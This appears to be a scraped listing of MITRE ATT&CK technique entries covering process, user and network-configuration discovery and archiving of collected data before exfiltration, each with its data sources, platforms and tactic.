Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre